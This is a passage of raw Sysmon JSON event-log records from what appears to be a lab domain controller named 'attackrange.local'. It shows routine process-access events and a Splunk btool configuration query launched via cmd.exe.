:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3432,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3433,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3434,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023B-5F25-0000-001061470500}\r\nTargetProcessId: 4404\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023B-5F25-0000-001061470500}","TargetProcessId":"4404","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3435,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.958\r\nProcessGuid: {A837DB8D-023B-5F25-0000-00101D480500}\r\nProcessId: 4356\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list replication_port --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {A837DB8D-023B-5F25-0000-001061470500}\r\nParentProcessId: 4404\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.958","ProcessGuid":"{A837DB8D-023B-5F25-0000-00101D480500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list replication_port --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{A837DB8D-023B-5F25-0000-001061470500}","ParentProcessId":"4404","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3436,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-023B-5F25-0000-001061470500}\r\nSourceProcessId: 4404\r\nSourceThreadId: 4400\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-023B-5F25-0000-00101D480500}\r\nTargetProcessId: 4356\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-023B-5F25-0000-001061470500}","SourceProcessId":"4404","SourceThreadId":"4400","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-023B-5F25-0000-00101D480500}","TargetProcessId":"4356","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3437,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023B-5F25-0000-00101D480500}\r\nTargetProcessId: 4356\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023B-5F25-0000-00101D480500}","TargetProcessId":"4356","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3438,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3439,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3440,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3441,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 